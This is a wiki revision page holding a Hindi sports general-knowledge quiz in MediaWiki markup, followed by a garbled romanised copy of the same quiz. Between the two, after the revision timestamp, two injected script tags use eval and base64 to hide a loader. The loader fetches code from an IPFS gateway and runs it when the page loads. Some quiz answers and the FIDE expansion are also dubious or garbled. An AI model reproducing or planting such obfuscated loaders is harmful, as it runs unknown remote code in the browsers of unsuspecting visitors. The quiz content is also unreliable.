Difference between revisions of "प्रयोग:शिल्पी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
(पन्ने को खाली किया)
Line 1: Line 1:
 +
{{सामान्य ज्ञान प्रश्नोत्तरी}}
 +
{{खेल सामान्य ज्ञान}}
 +
{{सामान्य ज्ञान नोट}}
 +
{| class="bharattable-green" width="100%"
 +
|-
 +
| valign="top"|
 +
{| width="100%"
 +
|
 +
<quiz display=simple>
 +
{[[भारत]] में सबसे बड़ा इंडोर स्टेडियम कौन सा हैं?
 +
|type="()"}
 +
+इंदिरा गाँधी इंडोर स्टेडियम दिल्ली
 +
-जवाहरलाल नेहरू स्टेडियम
 +
-मेजर ध्यानचन्द स्टेडियम
 +
-श्यामा प्रसाद मुखर्जी स्टेडियम
  
 +
{[[विजेन्द्र कुमार सिंह]] किस से संबंधित हैं?
 +
|type="()"}
 +
-[[क्रिकेट]]
 +
-[[हॉकी]]
 +
+बॉक्सिंग
 +
-टेनिस
 +
 +
 +
{[[2010]] में आयोजित [[राष्ट्रमंडल खेल 2010|राष्ट्रमंडलीय खेलों]] में कौन से दो नये [[खेल]] जोड़े गये?
 +
|type="()"}
 +
-तीरंदाजी तथा एक्वेटिक्स
 +
+टेनिस तथा धनुर्विद्या
 +
-एथलेटिक्स तथा बैडमिंटन
 +
-बॉक्सिंग तथा साइकिलिंग
 +
 +
{बीमर शब्द का सम्बन्ध किस [[खेल]] से है?
 +
|type="()"}
 +
+[[क्रिकेट]]
 +
-शूटिंग
 +
-टेनिस
 +
-कुश्ती
 +
 +
{आगा ख़ाँ कप का संबंध किस खेल है?
 +
|type="()"}
 +
+[[हॉकी]]
 +
-तीरंदाजी
 +
-बैडमिंटन
 +
-बॉक्सिंग
 +
||भारत का राष्ट्रीय खेल हॉकी है। हॉकी का प्रारम्भ वर्ष 2010 से 4,000 वर्ष पूर्व ईरान में हुआ था। इसके बाद बहुत से देशों में इसका आगमन हुआ पर उचित स्थान न मिल सका। अन्त में इसे भारत में विशेष सम्मान मिला और यह राष्ट्रीय खेल बना गया। हमारे देश में इसका आरम्भ 100 वर्षों से पहले हुआ था।{{point}}अधिक जानकारी के लिए देखें:- [[हॉकी]]
 +
 +
{जीव मिल्खा सिंह, ज्योति रंधावा व टाइगर वुड किस खेल के प्रसिद्ध खिलाड़ी हैं?
 +
|type="()"}
 +
-टेबल टेनिस
 +
-टेनिस
 +
-भारोत्तोलन
 +
+गोल्फ
 +
 +
{शार्ट कॉर्नर, टाई ब्रेकर व पेनेल्टी स्ट्रोक किस खेल सम्बन्धित हैं?
 +
|type="()"}
 +
+[[हॉकी]]
 +
-गोल्फ
 +
-बॉक्सिंग
 +
-टेनिस
 +
||भारत का राष्ट्रीय खेल हॉकी है। हॉकी का प्रारम्भ वर्ष 2010 से 4,000 वर्ष पूर्व ईरान में हुआ था। इसके बाद बहुत से देशों में इसका आगमन हुआ पर उचित स्थान न मिल सका। अन्त में इसे भारत में विशेष सम्मान मिला और यह राष्ट्रीय खेल बना गया। हमारे देश में इसका आरम्भ 100 वर्षों से पहले हुआ था।{{point}}अधिक जानकारी के लिए देखें:- [[हॉकी]]
 +
 +
{ओलंपिक खेल कितने अंतराल पर आयोजन किये जाते हैं?
 +
|type="()"}
 +
+4 वर्ष
 +
-3 वर्ष
 +
-5 वर्ष
 +
-7 वर्ष
 +
 +
{2014 फुटबॉल विश्वकप का आयोजन कौन सा देश करेगा?
 +
|type="()"}
 +
-[[भारत]]
 +
-[[बांग्लादेश]]
 +
+ब्राजील
 +
-[[पंजाब]]
 +
 +
 +
{ईडर गार्डन स्टेडियम [[भारत]] में कहाँ पर स्थित है?
 +
|type="()"}
 +
-[[मुम्बई]]
 +
-[[दिल्ली]]
 +
-[[पंजाब]]
 +
+[[कोलकाता]]
 +
||[[कोलकाता]] नगर निगम 200 से अधिक बग़ीचों, चौराहों और खुले मैदानों की देखरेख करता है। हालाँकि शहर के भीड़ भरे हिस्सों में बहुत कम स्थान है। लगभग 3.2 किलोमीटर लम्बा और 1.6 किलोमीटर चौड़ा मैदान सबसे प्रसिद्ध खुला स्थान है। यहीं पर फुटबाल, क्रिकेट और हॉकी के प्रमुख मैदान हैं।[[कोलकाता#मनोरंजन|कोलकाता]]
 +
 +
 +
{देवधर ट्रॉफी किस [[खेल]] से संबंधित है?
 +
|type="()"}
 +
+[[क्रिकेट]]
 +
-टेनिस
 +
-भारोत्तोलन
 +
-गोल्फ
 +
 +
{ब्रेस्ट स्ट्रोक किस [[खेल]] से संबंधित है?
 +
|type="()"}
 +
+तैराकी
 +
-तीरंदाजी
 +
-बैडमिंटन
 +
-शूटिंग
 +
 +
 +
{[[भारत]] में फेडरेशन कप किस [[खेल]] से संबंधित है?
 +
|type="()"}
 +
-[[हॉकी]]
 +
-तीरंदाजी
 +
-गोल्फ
 +
+फुटबॉल
 +
 +
{सॉकर किस खेल का दूसरा नाम है?
 +
|type="()"}
 +
+फुटबॉल
 +
-टेनिस
 +
-भारोत्तोलन
 +
-कुश्ती
 +
 +
{ओलपिंक खेलों में पदक जीतने वाली प्रथम महिला खिलाड़ी कौन है?
 +
|type="()"}
 +
-[[साइना नेहवाल]]
 +
-ज्वाला गुट्टा
 +
+कर्णम मल्लेश्वरी
 +
-सानिया मिर्जा
 +
 +
{कौन सी भारतीय महिला खिलाड़ी पायली एक्सप्रेस के नाम से जानी जाती है?
 +
|type="()"}
 +
+[[पी. टी. उषा]]
 +
-[[साइना नेहवाल]]
 +
-ज्वाला गुट्टा
 +
-सीमा अंतिल
 +
||पी. टी. उषा का जन्म [[27 जून]] [[1964]] को [[केरल]] के कोज़िकोड ज़िले के पय्योली ग्राम में हुआ था। इनका पूरा नाम पिलावुळ्ळकण्टि तेक्केपरम्पिल् उषा है और ये [[भारत]] के केरल राज्य की खिलाड़ी हैं। [[1976]] में केरल राज्य सरकार ने महिलाओं के लिए एक खेल विद्यालय खोला और उषा को अपने ज़िले का प्रतिनिधि चुना गया।{{Point}} अधिक जानकारी के लिए देखें:- [[पी. टी. उषा]]
 +
 +
{[[भारत]] ने अंतिम बार ओलंपिक खेलों में [[हॉकी]] का स्वर्ण पदक कब जीता था?
 +
|type="()"}
 +
+[[1980]] में मॉस्को
 +
-[[1984]] में लॉस एंजिल्स
 +
-[[2008]] में बीजिंग
 +
-[[2000]] में सिडनी
 +
 +
{एशेज क्रिकेट श्रृंखला किन दो देशों के बीच खेली जाती है?
 +
|type="()"}
 +
+आस्ट्रेलिया और [[इंग्लैण्ड]]
 +
-[[भारत]] और [[पाकिस्तान]]
 +
-[[भारत]] और [[इंग्लैण्ड]]
 +
-[[भारत]] और [[श्रीलंका]]
 +
 +
{संदीप सिंह किस खेल के प्रसिद्ध खिलाड़ी हैं?
 +
|type="()"}
 +
-[[क्रिकेट]]
 +
+[[हॉकी]]
 +
-तीरंदाजी
 +
-फुटबॉल
 +
||भारत का राष्ट्रीय खेल हॉकी है। हॉकी का प्रारम्भ वर्ष 2010 से 4,000 वर्ष पूर्व ईरान में हुआ था। इसके बाद बहुत से देशों में इसका आगमन हुआ पर उचित स्थान न मिल सका। अन्त में इसे भारत में विशेष सम्मान मिला और यह राष्ट्रीय खेल बना गया। हमारे देश में इसका आरम्भ 100 वर्षों से पहले हुआ था।{{point}}अधिक जानकारी के लिए देखें:- [[हॉकी]]
 +
 +
{क्रीज़, डक, ड्राइवर शब्द किस खेल से संबंधित कहा जाता है?
 +
|type="()"}
 +
+[[क्रिकेट]]
 +
-फुटबॉल
 +
-शतरंज
 +
-नेटबॉल
 +
 +
{किस मैगज़ीन को क्रिकेट की बाइबिल कहा जाता है?
 +
|type="()"}
 +
-क्रिकेट सम्राट
 +
 +
+विज़डेन
 +
-क्रिकइंफो
 +
-क्रिकबज़
 +
 +
{[[भारत]] का सर्वोच्च खेल पुरस्कार कौन सा है?
 +
|type="()"}
 +
-अर्जुन पुरस्कार
 +
-केके बिरला फाउंडेशन खेल पुरस्कार
 +
+राजीव गाँधी खेल रत्न पुरस्कार
 +
-राष्ट्रीय नागरिक पुरस्कार
 +
 +
{सोमदेव देवबर्मन किस [[खेल]] से संबंधित हैं?
 +
|type="()"}
 +
+लॉन टेनिस
 +
-टेबल टेनिस
 +
-टेनिस
 +
-[[क्रिकेट]]
 +
 +
{[[भारत]] का राष्ट्रीय खेल कौन सा है?
 +
|type="()"}
 +
-[[क्रिकेट]]
 +
 +
-शतरंज
 +
 +
-तीरंदाजी
 +
+[[हॉकी]]
 +
||भारत का राष्ट्रीय खेल हॉकी है। हॉकी का प्रारम्भ वर्ष 2010 से 4,000 वर्ष पूर्व ईरान में हुआ था। इसके बाद बहुत से देशों में इसका आगमन हुआ पर उचित स्थान न मिल सका। अन्त में इसे भारत में विशेष सम्मान मिला और यह राष्ट्रीय खेल बना गया। हमारे देश में इसका आरम्भ 100 वर्षों से पहले हुआ था।{{point}}अधिक जानकारी के लिए देखें:- [[हॉकी]]
 +
 +
{प्रथम ओलंपिक खेल किस वर्ष आयोजित किये गये थे?
 +
|type="()"}
 +
+वर्ष [[1896]] (एथेंस, ग्रीस)
 +
-वर्ष [[1924]] (पेरिस, फ़्रांस)
 +
-वर्ष [[1960]] (रोम, [[इटली]])
 +
-वर्ष [[2000]] (सिडनी, आस्ट्रेलिया)
 +
 +
 +
{राष्ट्रमंडल खेलों में पदक जीतने वाले प्रथम भारतीय कौन थे?
 +
|type="()"}
 +
+राशिद अनवर
 +
{[[2011]] का क्रिकेट विश्व कप किन तीन देशों द्वारा आयोजित किया जायेगा?
 +
|type="()"}
 +
+[[भारत]], [[श्रीलंका]], [[बांग्लादेश]]
 +
{शतरंज से संबंधित 'फिडे' का पूर्ण रूप क्या है?
 +
|type="()"}
 +
+फेडरेशन इंटरनेशनल डि इसेक्स

Revision as of 11:08, 22 April 2011

samany jnan prashnottari
rajyoan ke samany jnan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne par jaean

1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75
Bulbgraph.png is samany jnan prashnottari mean kul 15 prashn haian. ise hal karane ke uparaant panne ke niche ki or "parinam dekhean" par klik karean aur uttaroan ka milan karean sath hi arjit aank bhi dekhean.

<quiz display=simple> {bharat mean sabase b da iandor stediyam kaun sa haian?

type="()"}

+iandira gaandhi iandor stediyam dilli -javaharalal neharoo stediyam -mejar dhyanachand stediyam -shyama prasad mukharji stediyam

{vijendr kumar sianh kis se sanbandhit haian?

type="()"}

-kriket -h aauki +b aauksiang -tenis


{2010 mean ayojit rashtramandaliy kheloan mean kaun se do naye khel jo de gaye?

type="()"}

-tirandaji tatha ekvetiks +tenis tatha dhanurvidya -ethaletiks tatha baidamiantan -b aauksiang tatha saikiliang

{bimar shabd ka sambandh kis khel se hai?

type="()"}

+kriket -shootiang -tenis -kushti

{aga khaan kap ka sanbandh kis khel hai?

type="()"}

+h aauki -tirandaji -baidamiantan -b aauksiang

bharat ka rashtriy khel h aauki hai. h aauki ka prarambh varsh 2010 se 4,000 varsh poorv eeran mean hua tha. isake bad bahut se deshoan mean isaka agaman hua par uchit sthan n mil saka. ant mean ise bharat mean vishesh samman mila aur yah rashtriy khel bana gaya. hamare desh mean isaka arambh 100 varshoan se pahale hua tha.{{#icon: Redirect-01.gif|dhyan dean}}adhik janakari ke lie dekhean:- h aauki

{jiv milkha sianh, jyoti randhava v taigar vud kis khel ke prasiddh khila di haian?

type="()"}

-tebal tenis -tenis -bharottolan +golph

{shart k aaurnar, taee brekar v penelti strok kis khel sambandhit haian?

type="()"}

+h aauki -golph -b aauksiang -tenis

bharat ka rashtriy khel h aauki hai. h aauki ka prarambh varsh 2010 se 4,000 varsh poorv eeran mean hua tha. isake bad bahut se deshoan mean isaka agaman hua par uchit sthan n mil saka. ant mean ise bharat mean vishesh samman mila aur yah rashtriy khel bana gaya. hamare desh mean isaka arambh 100 varshoan se pahale hua tha.{{#icon: Redirect-01.gif|dhyan dean}}adhik janakari ke lie dekhean:- h aauki

{olanpik khel kitane aantaral par ayojan kiye jate haian?

type="()"}

+4 varsh -3 varsh -5 varsh -7 varsh

{2014 phutab aaul vishvakap ka ayojan kaun sa desh karega?

type="()"}

-bharat -baangladesh +brajil -panjab


{eedar gardan stediyam bharat mean kahaan par sthit hai?

type="()"}

-mumbee -dilli -panjab +kolakata

kolakata nagar nigam 200 se adhik bagichoan, chaurahoan aur khule maidanoan ki dekharekh karata hai. halaanki shahar ke bhi d bhare hissoan mean bahut kam sthan hai. lagabhag 3.2 kilomitar lamba aur 1.6 kilomitar chau da maidan sabase prasiddh khula sthan hai. yahian par phutabal, kriket aur h aauki ke pramukh maidan haian.kolakata


{devadhar tr aauphi kis khel se sanbandhit hai?

type="()"}

+kriket -tenis -bharottolan -golph

{brest strok kis khel se sanbandhit hai?

type="()"}

+tairaki -tirandaji -baidamiantan -shootiang


{bharat mean phedareshan kap kis khel se sanbandhit hai?

type="()"}

-h aauki -tirandaji -golph +phutab aaul

{s aaukar kis khel ka doosara nam hai?

type="()"}

+phutab aaul -tenis -bharottolan -kushti

{olapiank kheloan mean padak jitane vali pratham mahila khila di kaun hai?

type="()"}

-saina nehaval -jvala gutta +karnam malleshvari -saniya mirja

{kaun si bharatiy mahila khila di payali eksapres ke nam se jani jati hai?

type="()"}

+pi. ti. usha -saina nehaval -jvala gutta -sima aantil

pi. ti. usha ka janm 27 joon 1964 ko keral ke kozikod zile ke payyoli gram mean hua tha. inaka poora nam pilavuळhळkanti tekkeparampilh usha hai aur ye bharat ke keral rajy ki khila di haian. 1976 mean keral rajy sarakar ne mahilaoan ke lie ek khel vidyalay khola aur usha ko apane zile ka pratinidhi chuna gaya.{{#icon: Redirect-01.gif|dhyan dean}} adhik janakari ke lie dekhean:- pi. ti. usha

{bharat ne aantim bar olanpik kheloan mean h aauki ka svarn padak kab jita tha?

type="()"}

+1980 mean m aausko -1984 mean l aaus eanjils -2008 mean bijiang -2000 mean sidani

{eshej kriket shrriankhala kin do deshoan ke bich kheli jati hai?

type="()"}

+astreliya aur ianglaind -bharat aur pakistan -bharat aur ianglaind -bharat aur shrilanka

{sandip sianh kis khel ke prasiddh khila di haian?

type="()"}

-kriket +h aauki -tirandaji -phutab aaul

bharat ka rashtriy khel h aauki hai. h aauki ka prarambh varsh 2010 se 4,000 varsh poorv eeran mean hua tha. isake bad bahut se deshoan mean isaka agaman hua par uchit sthan n mil saka. ant mean ise bharat mean vishesh samman mila aur yah rashtriy khel bana gaya. hamare desh mean isaka arambh 100 varshoan se pahale hua tha.{{#icon: Redirect-01.gif|dhyan dean}}adhik janakari ke lie dekhean:- h aauki

{kriz, dak, draivar shabd kis khel se sanbandhit kaha jata hai?

type="()"}

+kriket -phutab aaul -shataranj -netab aaul

{kis maigazin ko kriket ki baibil kaha jata hai?

type="()"}

-kriket samrat

+vizaden -krikianpho -krikabaz

{bharat ka sarvochch khel puraskar kaun sa hai?

type="()"}

-arjun puraskar -keke birala phauandeshan khel puraskar +rajiv gaandhi khel ratn puraskar -rashtriy nagarik puraskar

{somadev devabarman kis khel se sanbandhit haian?

type="()"}

+l aaun tenis -tebal tenis -tenis -kriket

{bharat ka rashtriy khel kaun sa hai?

type="()"}

-kriket

-shataranj

-tirandaji +h aauki

bharat ka rashtriy khel h aauki hai. h aauki ka prarambh varsh 2010 se 4,000 varsh poorv eeran mean hua tha. isake bad bahut se deshoan mean isaka agaman hua par uchit sthan n mil saka. ant mean ise bharat mean vishesh samman mila aur yah rashtriy khel bana gaya. hamare desh mean isaka arambh 100 varshoan se pahale hua tha.{{#icon: Redirect-01.gif|dhyan dean}}adhik janakari ke lie dekhean:- h aauki

{pratham olanpik khel kis varsh ayojit kiye gaye the?

type="()"}

+varsh 1896 (etheans, gris) -varsh 1924 (peris, fraans) -varsh 1960 (rom, itali) -varsh 2000 (sidani, astreliya)


{rashtramandal kheloan mean padak jitane vale pratham bharatiy kaun the?

type="()"}

+rashid anavar {2011 ka kriket vishv kap kin tin deshoan dvara ayojit kiya jayega?

type="()"}

+bharat, shrilanka, baangladesh {shataranj se sanbandhit 'phide' ka poorn roop kya hai?

type="()"}

+phedareshan iantaraneshanal di iseks